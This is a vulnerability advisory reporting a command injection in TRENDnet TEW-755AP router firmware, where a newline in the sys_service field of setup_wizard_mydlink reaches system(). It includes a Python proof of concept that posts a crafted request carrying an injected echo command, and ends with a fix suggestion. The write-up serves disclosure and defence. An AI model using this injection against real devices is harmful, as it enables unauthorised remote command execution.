We found a command injection vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action setup_wizard_mydlink (sub_4104B8) of the file /www/cgi/ssi, the value of sys_service is finally passed into system, resulting in command injection.

Even though the webserver has filtered some dangerous characters like “;” or “|”, but “\n” is not filtered. An attacker can use “\n” to separate the command to achieve remote command execution.

PoC

import requests

url = "<http://192.168.17.221:80/apply_sec.cgi>"
cookie = {"Cookie":"uid=1234"}
data = { 
    'action' : "setup_wizard_mydlink",
    "sys_service" : "\\necho [proof of command injection]\\n"
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message. We specify sys_service as "\necho [proof of command injection]\n".

Send the crafted HTTP request to the server. We can see that command echo [proof of command injection] is executed. This means that once this vulnerability is exploited, an attacker can execute an arbitrary command in the system.

Fix Suggestion:

Filter more dangerous characters like “\n”.